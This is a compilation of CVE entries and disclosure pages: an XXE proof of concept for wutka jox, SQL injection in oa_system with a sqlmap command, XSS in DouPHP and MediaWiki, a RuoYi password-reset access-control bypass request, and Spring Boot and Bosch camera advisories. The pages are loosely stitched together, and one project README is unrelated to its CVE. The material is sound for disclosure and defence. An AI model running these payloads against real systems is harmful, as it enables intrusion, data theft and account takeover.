An XML External Entity (XXE) vulnerability exists in wuta jox 1.16 in the readObject method in JOXSAXBeanInput.

A component found during a code audit at the customer site.  
The affected version is <=1.16

https://mvnrepository.com/artifact/com.wutka/jox/1.16

According to the official demo, the data will first be passed to the readObject method of JOXBeanInputStream:  
![](https://novysodope.github.io/images/64/1.png)  
In the readObejct method of the object JOXBeanInputStream, the parameters will continue to be passed into the readObejct method of the JOXSAXBeanInput class for processing:  
![](https://novysodope.github.io/images/64/2.png)  
Follow up with the JOXSAXBeanInput class:  
![](https://novysodope.github.io/images/64/3.png)  
In the readObject method of this class, the parse method of SAXParser is called to directly parse the XML document. No other verification is performed, so that the malicious xml data can be used to trigger the vulnerability.

Vulnerability verification:  
Reference dependencies in pom files:

    <dependency>      <groupId>com.wutka</groupId>      <artifactId>jox</artifactId>      <version>1.16</version>    </dependency>

Refer to the official to write a class that calls JOXBeanInputStream to parse xml:

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  
26  
27  
28  
29  
30  
31  
32  
33  
34  
35  
36  
37  
38  
39  
40  
41  
42  
43  
44  
45  
46  
47  
48  
49  
50  
51  
52  
53  
54  
55  
56  
57  
58  

    import java.io.ByteArrayInputStream;import com.wutka.jox.JOXBeanInputStream;import com.wutka.jox.JOXBeanOutputStream;import java.io.ByteArrayOutputStream;import java.io.IOException;/** * @Author novy * @Date 2021/10/22 11:22 * @Version 1.0 */    public class BeanXMLMapping {        /**         *         *         Retrieves a bean object for the         *         *         *         * received XML and matching bean class         */        public static Object fromXML(String xml, Class className) throws IOException {            ByteArrayInputStream xmlData = new ByteArrayInputStream(xml.getBytes());            JOXBeanInputStream joxIn = new JOXBeanInputStream(xmlData);            try {                return joxIn.readObject(className);            } catch (IOException exc) {                exc.printStackTrace();                return null;            } finally {                try {                    xmlData.close();                    joxIn.close();                } catch (Exception e) {                    e.printStackTrace();                }            }        }

POC:

    @RequestMapping("/jox")   public void joxxml(@RequestBody String req, HttpServletResponse response) throws IOException {       BeanXMLMapping aaa = new BeanXMLMapping();       aaa.fromXML(req,TestController.class);//TestController.class is arbitrary class added to meet the conditions

Finally, send the payload to trigger the vulnerability

    <?xml version="1.0" encoding="utf-8"?><!DOCTYPE creds [        <!ELEMENT creds ANY >        <!ENTITY xxe SYSTEM "dnslog">        ]><creds>    &xxe;</creds>

![](https://novysodope.github.io/images/64/7.png)

Refer to:  
简单SAX解析详解全过程

CVE-2021-43142: wutkajox XXE

An SQL Injection vulnerability exists in glorylion JFinalOA as of 9/7/2021 in the defkey parameter getHaveDoneTaskDataList method of the FlowTaskController.

有兴趣请帮点一下Star，谢谢支持。

**关于springboot版本**

**因为时间有限，从头搭建springboot版本需要大量时间，故计划使用若依集成flowable，并提供几个业务案例demo。**

**git地址为 https://gitee.com/glorylion/RuoYi-OA 。**

**项目介绍**

最新版已从Activiti升级为Flowable（点击查看Activiti与Flowable区别）

qq:439635374

qq交流群号：136981051

演示项目中有很多审批流的业务为自己开发使用仅供参考（不方便开源），开源项目中仅提供公章使用申请作为示例代码，其他基础功能全部开源，望知晓。

码云地址：http://git.oschina.net/glorylion/JFinalOA

演示地址：http://119.29.150.171:8085/JFinalOA

如何部署：http://119.29.150.171:8085/JFinalOA/front/help/howToRunJFinalOA

最新版为Tab页签版本，需要单页面版本的，请选标签，下载 1.0.2 版本使用。

默认密码：admin/admin

其他用户的帐号密码：帐号密码均为姓名的全拼。

1.  JDK请使用1.8（flowable要求）
2.  数据库如果导入失败，请使用mysql5.6+navicat还原psc文件
3.  启动项目如果出现一套大写的ACT开头的数据库表，请将大写表删除之后，设置数据库忽略大小写，重新启动项目

**1.简单介绍**

项目主要提供办公系统的开发人员提供一套带有基本系统管理以及流程管理的开发平台，为办公常用申请部分解决方案。可快速开发办公常用的各类流程功能。

选用的技术框架基本都是简单易上手的，方便自己用来做办公类项目，以及其他类型小项目都会比较方便。

**2.如何运行**

1.  克隆项目之后，导入项目到eclipse。
2.  执行maven update project下载jar包。
3.  配置maven run config使用命令tomcat7:run运行。
4.  或者添加tomcat server将项目部署到tomcat运行。

**3.部分截图**

登录 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095251_f70c0376_868436.png "在这里输入图片标题") 首页 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095253_5ff7c61e_868436.png "在这里输入图片标题") 即时通讯 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095251_9761cd0e_868436.png "在这里输入图片标题") UI ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095251_89761846_868436.png "在这里输入图片标题") 公文DEMO ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095251_fce70eef_868436.png "在这里输入图片标题") 流转历史 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095251_af8a034f_868436.png "在这里输入图片标题") 流程跟踪 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_fcce3784_868436.png "在这里输入图片标题") 菜单管理 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_3d7d1e64_868436.png "在这里输入图片标题") 用户管理 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_34434dc4_868436.png "在这里输入图片标题") 流程管理 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_763b9834_868436.png "在这里输入图片标题") 流程编辑 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_c1cba53c_868436.png "在这里输入图片标题") 代码生成 ![输入图片说明](https://images.gitee.com/uploads/images/2019/0114/095252_5ce7189b_868436.png "在这里输入图片标题")

CVE-2021-40645: 点狮/JFinalOA

An SQL Injection vulnerability exists in oasys oa_system as of 9/7/2021 in resources/mappers/notice-mapper.xml.

#oa\_system：

#sql injection

The vulnerability was discovered by downloading the program's source code to local and online deployment tests.

Location:

src/main/resources/mappers/notice-mapper.xml

Code：

<select id="sortMyNotice" resultType="java.util.Map">

SELECT n.\*,u.\* FROM

aoa\_notice\_list AS n LEFT JOIN aoa\_notice\_user\_relation AS u ON

n.notice\_id=u.relatin\_notice\_id WHERE u.relatin\_user\_id=#{userId}

<if test="baseKey !=null">

and n.title LIKE '%${baseKey}%'

</if>

Rows:27

Harm：

The attacker only needs an ordinary user to trigger the vulnerability and use the SQL injection vulnerability to obtain database information.

Conditions for Execution：

Need a regular account

Edition：

Version = all

Cause the cause ：

Directly use ${%%} for fuzzy query after like, which leads to the generation of loopholes:

and n.title LIKE'%${baseKey}%'

POC：

Construct the url according to the controller's route:

http://localhost/informlistpaging?baseKey=

Payload:

Taking into account the need to log in, so use burpsuite to capture the package and save it to txt and then use sqlmap to test

sqlmap.py -r D:\\test.txt --random-agent --dbs --current-db

CVE-2021-40644: VulReq/oa_system at main · novysodope/VulReq

** UNSUPPORTED WHEN ASSIGNED ** spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer.

**Package**

maven org.springframework.boot:spring-boot (Maven)

**Affected versions**

< v2.2.11.RELEASE

**Patched versions**

v2.2.11.RELEASE

This was originally spotted by @trugPa and communicated here: github/codeql#4473 (comment)

**Impact**

spring-boot versions prior to version `v2.2.11.RELEASE` was vulnerable to temporary directory hijacking. This vulnerability impacted the `org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir` method.

The vulnerable method is used to create a work directory for embedded web servers such as Tomcat and Jetty. The directory contains configuration files, JSP/class files, etc. If a local attacker got the permission to write in this directory, they could completely take over the application (ie. local privilege escalation).

**Impact Location**

This vulnerability impacted the following source location:

	/\*\*
	 \* Return the absolute temp dir for given web server.
	 \* @param prefix server name
	 \* @return the temp dir for given server.
	 \*/
	protected final File createTempDir(String prefix) {
		try {
			File tempDir = File.createTempFile(prefix + ".", "." + getPort());
			tempDir.delete();
			tempDir.mkdir();
			tempDir.deleteOnExit();
			return tempDir;
		}

\- https://github.com/spring-projects/spring-boot/blob/ce70e7d768977242a8ea6f93188388f273be5851/spring-boot-project/spring-boot/src/main/java/org/springframework/boot/web/server/AbstractConfigurableWebServerFactory.java#L165-L177

This vulnerability exists because `File.mkdir` returns `false` when it fails to create a directory, it does not throw an exception. As such, the following race condition exists:

File tmpDir =File.createTempFile(prefix + ".", "." + getPort()); // Attacker knows the full path of the file that will be generated
// delete the file that was created
tmpDir.delete(); // Attacker sees file is deleted and begins a race to create their own directory before Jetty.
// and make a directory of the same name
// SECURITY VULNERABILITY: Race Condition! - Attacker beats java code and now owns this directory
tmpDir.mkdirs(); // This method returns 'false' because it was unable to create the directory. No exception is thrown.
// Attacker can write any new files to this directory that they wish.
// Attacker can read any files created by this process.

**Prerequisites**

This vulnerability impacts Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.

**Patches**

This vulnerability was inadvertently fixed as a part of this patch: spring-projects/spring-boot@667ccda

This vulnerability is patched in versions `v2.2.11.RELEASE` or later.

**Workarounds**

Setting the `java.io.tmpdir` system environment variable to a directory that is exclusively owned by the executing user will fix this vulnerability for all operating systems.

**CVE ID**

CVE-2022-27772

**GHSA ID**

GHSA-cm59-pr5q-cw85

**CWEs**

**CVSS Score**

7.8 High

CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

**Credits**

CVE-2022-27772: Build software better, together

An issue was discovered in Firmware Analysis and Comparison Tool v3.2. With administrator privileges, the attacker could perform stored XSS attacks by inserting JavaScript and HTML code in user creation functionality.

CVE-2021-44310

A specially crafted TCP/IP packet may cause a camera recovery image telnet interface to crash. It may also cause a buffer overflow which could enable remote code execution. The recovery image can only be booted with administrative rights or with physical access to the camera and allows the upload of a new firmware in case of a damaged firmware.

**Advisory Information**

*   **Advisory ID:** BOSCH-SA-478243-BT
*   **CVE Numbers and CVSS v3.1 Scores:**
    *   CVE-2021-23847
        *   Base Score: 9.8 (Critical)
    *   CVE-2021-23848
        *   Base Score: 8.3 (High)
    *   CVE-2021-23852
        *   Base Score: 4.9 (Medium)
    *   CVE-2021-23853
        *   Base Score: 8.3 (High)
    *   CVE-2021-23854
        *   Base Score: 8.3 (High)
*   **Published:** 09 Jun 2021
*   **Last Updated:** 09 Jun 2021

**Summary**

Multiple vulnerabilities for Bosch IP cameras have been discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch.

Bosch rates these vulnerabilities with CVSSv3.1 base scores from 9.8 (Critical) to 4.9 (Medium), where the actual rating depends on the individual vulnerability and the final rating on the customer’s environment.

Customers are strongly advised to upgrade to the fixed versions.

These vulnerabilities were discovered by Alexander Nochvay and Andrey Muravitsky from Kaspersky ICS CERT.

**Affected Products**

*   Bosch CPP Firmware on: CPP4, CPP6, CPP7, CPP7.3, CPP13
    *   CVE-2021-23848
    *   CVE-2021-23852
    *   CVE-2021-23853
*   Bosch CPP Firmware 7.62 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.70 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.72 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.75 on: CPP13
    *   CVE-2021-23854
*   Bosch CPP Firmware 7.76 on: CPP13
    *   CVE-2021-23854
*   Bosch CPP Firmware < 7.80 B128 on: CPP6, CPP7, CPP7.3
    *   CVE-2021-23847

**Solution and Mitigations****Software Updates**

The recommended approach is to update the affected Bosch firmware to a fixed version. If an update is not possible in timely manner, users are recommended to follow the mitigations and workarounds described in the following section.

Platform

Affected/revoked firmware

Fixed firmware

CPP4

7.10

7.10.0095

CPP6

7.60, 7.61

7.62.0005

7.70, 7.80

7.80.0129

AVIOTEC

7.61, 7.72

7.72.0013

CPP7

7.60, 7.61

7.62.0005

7.70, 7.72, 7.80

7.80.0129

CPP7.3

7.60, 7.61, 7.62

7.62.0005

7.70, 7.72, 7.73, 7.80

7.80.0129

CPP13

7.75

7.75.0008

**Firewalling**

Disallowing connections from insecure networks to the camera by means of a firewall prevents the attacker from accessing the vulnerable interface.

**IP Filtering**

The camera has the possibility to whitelist networks or IP addresses to only allow access from trusted networks or IPs, preventing an attacker from accessing the camera.

**Using certificate based authentication**

To mitigate the critical vulnerability CVE-2021-23847, certificate based user authentication for the camera can be used as the SSL based authentication happens, before the vulnerable component can be accessed. This prevents an unauthenticated attacker from accessing the interface.

**Secure Configuration Environment**

It is advised to use a Bosch tool like the Configuration Manager to configure the camera, that does not allow for issues like XSS.

When using the web based configuration interface and currently being logged in as administrator, some security precautions can be taken to mitigate XSS vulnerabilities:

*   No other websites or email content should be opened as long as the session to the camera is active
    
*   No links should be clicked from an untrusted external source that link back to the camera.
    
*   Use a different browser than the system default browser to open a session to the camera as there is no XSS between browsers.
    
*   Always log out and/or close the browser (not only the tab) to clear any session data
    

**Vulnerability Details****CVE-2021-23847**

CVE description: A Missing Authentication in Critical Function in Bosch IP cameras allows an unauthenticated remote attacker to extract sensitive information or change settings of the camera by sending crafted requests to the device.

Only devices of the CPP6, CPP7 and CPP7.3 family with firmware 7.70, 7.72, and 7.80 prior to B128 are affected by this vulnerability. Versions 7.62 or lower and INTEOX cameras are not affected.

*   Problem Type:
    *   CWE-287 Improper Authentication
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    *   Base Score: 9.8 (Critical)

**CVE-2021-23848**

CVE description: An error in the URL handler may lead to a reflected cross site scripting (XSS) in the web-based interface. An attacker with knowledge of the camera address can send a crafted link to a user, which will execute javascript code in the context of the user.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**CVE-2021-23852**

CVE description: An authenticated attacker with administrator rights can call an URL with an invalid parameter that causes the camera to become unresponsive for a few seconds and cause a Denial of Service (DoS).

*   Problem Type:
    *   CWE-400 Uncontrolled Resource Consumption
*   CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
    *   Base Score: 4.9 (Medium)

**CVE-2021-23853**

CVE description: Improper validation of the HTTP header allows an attacker to inject arbitrary HTTP headers through crafted URLs.

*   Problem Type:
    *   CWE-20 Improper Input Validation
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**CVE-2021-23854**

CVE description: An error in the handling of a page parameter may lead to a reflected cross site scripting (XSS) in the web-based interface.

This issue only affects versions 7.7x and 7.6x. All other versions are not affected.

*   Problem Type:
    *   CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
*   CVSS Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
    *   Base Score: 8.3 (High)

**Remark**

Vulnerability classification has been performed using the CVSS v3.1 scoring system . The CVSS environmental score is specific to each customer’s environment and should be defined by the customer to attain a final scoring.

**Additional Resources**

*   \[1\] Firmware Download Area: https://downloadstore.boschsecurity.com/index.php?type=FW

Please contact the Bosch PSIRT if you have feedback, comments, or additional information about this vulnerability at: psirt@bosch.com .

**Revision History**

*   09 Jun 2021: Correction of build version number of fixed firmware
*   09 Jun 2021: Initial Publication

**Appendix****Affected Plattforms and Cameras**

**CPP13**

*   AUTODOME inteox 7000i
    
*   MIC inteox 7100i
    

**CPP7.3**

*   AUTODOME IP 4000i
    
*   AUTODOME IP 5000i
    
*   AUTODOME IP starlight 5000i (IR)
    
*   AUTODOME IP starlight 7000i
    
*   DINION IP 3000i
    
*   DINION IP bullet 4000i
    
*   DINION IP bullet 5000
    
*   DINION IP bullet 5000i
    
*   DINION IP bullet 6000i
    
*   FLEXIDOME IP 3000i
    
*   FLEXIDOME IP 4000i
    
*   FLEXIDOME IP 5000i
    
*   FLEXIDOME IP starlight 5000i (IR)
    
*   FLEXIDOME IP starlight 8000i
    
*   MIC IP starlight 7000i
    
*   MIC IP starlight 7100i
    
*   MIC IP ultra 7100i
    
*   MIC IP fusion 9000i
    

**CPP7**

*   DINION IP starlight 6000
    
*   DINION IP starlight 7000
    
*   DINION IP thermal 8000
    
*   FLEXIDOME IP starlight 6000
    
*   FLEXIDOME IP starlight 7000
    
*   DINION IP thermal 9000 RM
    

**CPP6**

*   DINION IP starlight 8000 12MP
    
*   DINION IP ultra 8000 12MP
    
*   DINION IP ultra 8000 12MP with C/CS mount telephoto lens
    
*   FLEXIDOME IP panoramic 6000 12MP 180
    
*   FLEXIDOME IP panoramic 6000 12MP 360
    
*   FLEXIDOME IP panoramic 6000 12MP 180 IVA
    
*   FLEXIDOME IP panoramic 6000 12MP 360 IVA
    
*   FLEXIDOME IP panoramic 7000 12MP 180
    
*   FLEXIDOME IP panoramic 7000 12MP 360
    
*   FLEXIDOME IP panoramic 7000 12MP 180 IVA
    
*   FLEXIDOME IP panoramic 7000 12MP 360 IVA
    

**CPP4**

*   AUTODOME IP 4000 HD
    
*   AUTODOME IP 5000 HD
    
*   AUTODOME IP 5000 IR
    
*   AUTODOME 7000 series
    
*   DINION HD 1080p
    
*   DINION HD 1080p HDR
    
*   DINION HD 720p
    
*   DINION imager 9000 HD
    
*   DINION IP bullet 4000
    
*   DINION IP bullet 5000
    
*   DINION IP 4000 HD
    
*   DINION IP 5000 HD
    
*   DINION IP 5000 MP
    
*   DINION IP starlight 7000 HD
    
*   FLEXIDOME corner 9000 MP
    
*   FLEXIDOME HD 1080p
    
*   FLEXIDOME HD 1080p HDR
    
*   FLEXIDOME HD 720p
    
*   Vandal-proof FLEXIDOME HD 1080p
    
*   Vandal-proof FLEXIDOME HD 1080p HDR
    
*   Vandal-proof FLEXIDOME HD 720p
    
*   FLEXIDOME IP micro 2000 HD
    
*   FLEXIDOME IP micro 2000 IP
    
*   FLEXIDOME IP indoor 4000 HD
    
*   FLEXIDOME IP indoor 4000 IR
    
*   FLEXIDOME IP outdoor 4000 HD
    
*   FLEXIDOME IP outdoor 4000 IR
    
*   FLEXIDOME IP indoor 5000 HD
    
*   FLEXIDOME IP indoor 5000 MP
    
*   FLEXIDOME IP micro 5000 MP
    
*   FLEXIDOME IP outdoor 5000 HD
    
*   FLEXIDOME IP outdoor 5000 MP
    
*   FLEXIDOME IP panoramic 5000
    
*   IP bullet 4000 HD
    
*   IP bullet 5000 HD
    
*   IP micro 2000
    
*   IP micro 2000 HD
    
*   MIC IP dynamic 7000
    
*   MIC IP starlight 7000
    
*   TINYON IP 2000 family

CVE-2021-23850: Multiple vulnerabilities in Bosch IP cameras

DouPHP v1.6 Release 20220121 is affected by Cross Site Scripting (XSS) through /admin/login.php in the background, which will lead to JavaScript code execution.

XSS vulnerability exists in douphp background adding articles.

Official demo site, administrator login. https://demo.douphp.com/admin/login.php

Source download address. https://down.douphp.com/DouPHP\_1.6\_Release\_20220121.zip

Log in to the background and add articles. ![image](https://github.com/zpxlz/douphp/raw/gh-pages/1.png)

Insert XSS code at the article name,Submit.

<script>alert(document.cookie)</script>

![image](https://github.com/zpxlz/douphp/raw/gh-pages/2.png)

Cookie pops up in the background. ![image](https://github.com/zpxlz/douphp/raw/gh-pages/3.png)

The foreground will also trigger vulnerabilities. ![image](https://github.com/zpxlz/douphp/raw/gh-pages/4.png)

CVE-2022-24131: GitHub - zpxlz/douphp: douphp

In RuoYi v4.7.2 through the WebUI, user test1 does not have permission to reset the password of user test3, but the password of user test3 can be reset through the /system/user/resetPwd request.

In the WebUI, user `test1` does not have permission to reset the password of user `test3`, but the password of user `test3` can be reset through the `/system/user/resetPwd` request.

Choose “System Management”- > “Role Management”(“系统管理”->”角色管理”) , and add the role of “testrole”.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223224_1be0da8c_10313790.jpeg "1.jpg")  
Set “Menu Permission” (“菜单权限”) as follows:  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223314_c5893c37_10313790.jpeg "2.jpg")  
“Data Permission”- > “Data Scope” (“数据权限”->“数据范围”) is set to “ Data Permission of the department”(“本部门数据权限”).  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223353_092d4485_10313790.jpeg "3.jpg")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223431_e73daafd_10313790.jpeg "4.jpg")  
2.  
Add a user named `test1`, and the userId is `100`. Add a user named `test3`, and the userId is `102`.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223514_4bf23299_10313790.jpeg "5.jpg")  
The “Home Department” (“归属部门”) of user `test1` is “ Marketing Department” (“市场部门”), and the “Role” ( “角色”) is testrole.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223531_5fce91b6_10313790.jpeg "6.jpg")  
The “Home Department” (“归属部门”) of user `test3` is “Financial Department” (“财务部门”), and the “Role” (“角色”) is testrole.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223546_7666bbfd_10313790.jpeg "7.jpg")  
3.  
After logging in to the system, user `test1` can see only user `test1` of the “marketing department”(“市场部门”), but not user `test3` of the “financial department”(“财务部门”).  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223607_89251d25_10313790.jpeg "8.jpg")  
4.  
The WebUI provides the “password reset”(“重置密码”) function. Invoke the resetPwd interface through the cookie of user `test1` to reset the password of user `test3`. The request parameters of user `test3` are `userId=102` and `loginName=test3`.  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223637_cf38e1c2_10313790.jpeg "9.jpg")  
![输入图片说明](https://images.gitee.com/uploads/images/2022/0118/223650_19fa287c_10313790.jpeg "10.jpg")

    POST /system/user/resetPwd HTTP/1.1
    Host: localhost:8090
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 42
    Origin: http://localhost:8090
    Connection: close
    Referer: http://localhost:8090/system/user/resetPwd/100
    Cookie: nav-style=default; JSESSIONID=xxxxxxx
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    userId=102&loginName=test3&password=123456
    

The password of user `test3` was reset successfully.

CVE-2022-23869: Broken Access Control Vulnerability · Issue #I4RCO2 · 若依/RuoYi - Gitee.com

An issue was discovered in MediaWiki through 1.37.1. The CentralAuth extension mishandles a ttl issue for groups expiring in the future.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-28205

An XSS issue was discovered in MediaWiki before 1.35.6, 1.36.x before 1.36.4, and 1.37.x before 1.37.2. The widthheight, widthheightpage, and nbytes properties of messages are not escaped when used in galleries or Special:RevisionDelete.

**

CVE-2022-: Messages widthheight/widthheightpage/nbytes not escaped when used in galleries or Special:RevisionDelete

Closed, ResolvedPublicSecurity



**

*   Edit Task
*   Edit Related Tasks...
*   Edit Related Objects...

*   Mute Notifications
*   Protect as security issue
*   Award Token
*   Flag For Later

**List of steps to reproduce** (step by step, including full links if applicable):

*   Be sure your wiki has files uploaded (non-pdfs)
*   Go to \[\[MediaWiki:Widthheight\]\] and append "<script>alert('XSS widthheight');</script>"
*   Go to index.php?title=Special:NewFiles&limit=2 and you will get the alerts

This is from ImageHandler::getDimensionsString and also includes "widthheightpage" for pdfs.  
It affects all gallery which shows dimensions, that is not true for parser/wikitext.  
The default depends on $wgGalleryOptions.  
Categories with files are affected  
Special:Uncategorizedimages and Special:Unusedimages and Special:Mostimages are affected.

A second case:

*   Log in as sysop
*   Go to Special:ListFiles and select a file with a 2 or higher in the Versions column
*   In the file history click "(change visibility)" and you will get the alert.

For the second case the escaped is also missing for message "nbytes" in RevDelFileItem::getHTML

**What happens?**:  
javascript alerts are shown.

**What should have happened instead?**:  
No javascript alert should be shown. The script tag must be presented as visible text.

**Software version (if not a Wikimedia wiki), browser information, screenshots, other information, etc**: current master

Risk Rating

Low

Author Affiliation

Wikimedia Communities

*   Task Graph

**Event Timeline**

Comment Actions

Only priviliged user can edit messages, but the use of Special:RevisionDelete also affects oversights.

I am not sure if problems with message escaping should be public or better private like this. Feel free to change as needed.

Comment Actions

Thanks for filling the task. Definitely let's keep this private (at least for now) – this is an active vulnerability (although it requires sysop rights to exploit).

Comment Actions

We've resolved many issues like this in public in the past (recent examples:  1   2 ).

I think it's much more practical, and not very risky, to resolve them in public. Or if there's a good reason not to do that, please let me know and I'll keep similar issues private in the future too.

Comment Actions

This should just be a simple s/text/escaped/ here and here, correct?

> I think it's much more practical, and not very risky, to resolve them in public. Or if there's a good reason not to do that, please let me know and I'll keep similar issues private in the future too.

I think the Security-Team is fine rating many of these msg issues (including this issue) as **low risk** if a patch can go through gerrit on a Monday just prior to the train cut.

Comment Actions

> This should just be a simple s/text/escaped/ here and here, correct?
> 
> > I think it's much more practical, and not very risky, to resolve them in public. Or if there's a good reason not to do that, please let me know and I'll keep similar issues private in the future too.
> 
> I think the Security-Team is fine rating many of these msg issues (including this issue) as **low risk** if a patch can go through gerrit on a Monday just prior to the train cut.

The return value of ImageHandler::getDimensionsString is escaped by the caller (at least in ImageHistoryList) and should be wrapped with htmlspecialchars in the Gallery here

The second part in RevDelFileItem is okay with /text/escaped/ replace.

Comment Actions

First attempt at a patch per @Umherirrender's advice above. Per my previous comment, this can be sent up and merged via gerrit next Monday if it looks decent.

Comment Actions

> First attempt at a patch per @Umherirrender's advice above. Per my previous comment, this can be sent up and merged via gerrit next Monday if it looks decent.

That works and looks very good. +2

sbassett changed Author Affiliation from N/A to Wikimedia Communities.

sbassett changed the visibility from "Custom Policy" to "Public (No Login Required)".

sbassett changed Risk Rating from N/A to Low.

Reedy added a parent task: Restricted Task.Sun, Mar 20, 2:51 PM

Reedy renamed this task from Messages widthheight/widthheightpage/nbytes not escaped when used in galleries or Special:RevisionDelete to CVE-2022-: Messages widthheight/widthheightpage/nbytes not escaped when used in galleries or Special:RevisionDelete.Mon, Mar 28, 1:53 PM

Content licensed under Creative Commons Attribution-ShareAlike 3.0 (CC-BY-SA) unless otherwise noted; code licensed under GNU General Public License (GPL) or other open source licenses. By using this site, you agree to the Terms of Use, Privacy Policy, and Code of Conduct. · Wikimedia Foundation · Privacy Policy · Code of Conduct · Terms of Use · Disclaimer · CC-BY-SA · GPL

Tag

#java